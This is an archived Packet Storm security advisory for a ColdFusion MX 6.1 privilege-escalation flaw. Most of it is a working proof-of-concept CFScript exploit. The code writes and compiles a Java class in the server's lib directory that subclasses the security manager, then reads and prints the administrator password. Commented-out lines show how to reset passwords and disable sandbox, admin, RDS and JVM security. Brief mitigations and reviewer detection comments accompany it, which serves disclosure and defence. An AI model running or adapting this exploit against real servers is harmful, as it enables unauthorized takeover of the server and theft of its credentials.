coldfusionmx61.txt

2004-10-07T00:00:00
ID PACKETSTORM:34552
Type packetstorm
Reporter Eric Lackey
Modified 2004-10-07T00:00:00

Description

                                        
                                            `Software: Macromedia ColdFusion MX 6.1  
  
Description:  
There is a vulnerability in the ColdFusion MX 6.1 product. To exploit  
it, a user needs to be able to create a ColdFusion template on a  
ColdFusion server that has the CreateObject function or the cfobject tag enabled. The  
code given below writes a Java class to the ColdFusion lib directory,  
which is writable by default. This code compiles the Java file,  
but there are other ways to write the class file if the compiler class  
is not available. Once the class is written, it can be loaded by CF  
and all of its methods are exposed. A user can then do a variety of things, such as  
retrieving the administrator password. Code and examples are given  
below.  
  
The two preconditions are also the points of mitigation: restrict  
CreateObject/cfobject for template authors who are not fully trusted, and  
remove the server process's write access to the lib directory where the  
deployment allows it.  
  
Platform Tested: Windows/Linux  
  
Version Tested: ColdFusion MX 6.1  
  
<cfscript>  
  
// Proof-of-concept from the advisory. A template that is allowed to create
// Java objects writes a Java source file into the server's lib directory,
// compiles it in-process and then instantiates the resulting class.
// Review view: every step depends on CreateObject("java", ...) being available
// to the template author and on lib being writable by the server process.

// Handles to JDK classes, all obtained through CreateObject("java", ...).
objFileWriter = CreateObject("java","java.io.FileWriter");  
  
objByteArray = CreateObject("java","java.io.ByteArrayOutputStream");  
  
// In-process compiler class; the advisory notes the class file could be
// produced another way when this class is not present.
objJavaC = CreateObject("java","sun.tools.javac.Main");  
  
objString = CreateObject("java","java.lang.String");  
  
objFile = CreateObject("java","java.io.File");  
  
// Path separator chosen from the reported OS name.
if (Server.Os.Name IS "Windows") { s = "\"; } else { s = "/"; }  
  
// All four paths sit under <Server.ColdFusion.Rootdir>/lib: the source file
// that gets written, cfusion.jar (compile classpath), and the two files later
// handed to the class constructor.
// Detection note: a new .java file in lib (and presumably a matching .class
// beside it; confirm on a test system) is an artefact worth alerting on.
strJavaSource = "#Server.ColdFusion.Rootdir##s#lib#s#SecurityExploit.java";   
  
strCfusionJar = "#Server.ColdFusion.Rootdir##s#lib#s#cfusion.jar";  
  
strNeoSecFile = "#Server.ColdFusion.Rootdir##s#lib#s#neo-security.xml";  
  
strPasswdFile = "#Server.ColdFusion.Rootdir##s#lib#s#password.properties";  
  
// Opens the source path for writing (second argument false = do not append)
// and emits a subclass of coldfusion.security.SecurityManager with a
// two-File constructor and isAdminSecurityEnabled() overridden to return false.
fileWriter = objFileWriter.init("#strJavaSource#",false);  
  
fileWriter.write("import coldfusion.security.SecurityManager;");  
  
fileWriter.write("import java.io.File;");  
  
fileWriter.write("public class SecurityExploit extends SecurityManager {");  
  
fileWriter.write("public SecurityExploit(File arg0, File arg1) {");  
  
fileWriter.write("super(arg0, arg1); }");  
  
fileWriter.write("public boolean isAdminSecurityEnabled(){");  
  
fileWriter.write("return false;}}");  
  
fileWriter.flush();  
  
fileWriter.close();  
  
// Compiler arguments are built as one comma-separated string and split into
// an array: -classpath, the cfusion.jar path, then the source path.
str = objString.init("-classpath,#strCfusionJar#,#strJavaSource#");  
  
strArr = str.split(",");  
  
// Compiler output goes to an in-memory stream that is never read back here.
byteArray = objByteArray.init();  
  
compileObj =objJavaC.init(byteArray,str);  
  
compileObj.compile(strArr);  
  
// Loads the newly written class by name and constructs it with File objects
// for neo-security.xml and password.properties, then calls load().
// NOTE(review): what load() does is not visible in this listing; presumably
// it reads the security configuration from those two files.
obj = CreateObject("java","SecurityExploit");  
  
file1 = objFile.init("#strNeoSecFile#");  
  
file2 = objFile.init("#strPasswdFile#");  
  
obj.init(file1,file2);  
  
obj.load();  
  
</cfscript>  
  
<cfscript>  
  
// Calls made on the object created in the previous script block. Only
// getAdminPassword() is active; the commented-out lines are the author's list
// of other methods the class exposes (admin and RDS passwords, sandbox
// security, administrator login, RDS login, JVM security).
// Review view: the list shows the impact is the whole security configuration,
// not only disclosure of one password.

// Get Administrator Password   
  
strAdminPw = obj.getAdminPassword();  
  
// Set Administrator Password  
  
//obj.setAdminPassword("test123");  
  
  
// Turn off Sandbox Security  
  
//obj.setSandboxSecurityEnabled(false);  
  
  
// Turn off Administrator Login  
  
//obj.setAdminSecurityEnabled(false);  
  
  
// Turn off RDS Login  
  
//obj.setRdsSecurityEnabled(false);  
  
  
// Set RDS Password  
  
//obj.setRdsPassword("test123");  
  
  
// Turn off JVM Security  
  
//obj.setJvmSecurityEnabled(false);  
  
</cfscript>  
  
<!--- Writes the retrieved value into the page output returned to the requester. --->
<cfoutput>Adminstrator Password: #strAdminPw#</cfoutput>  
`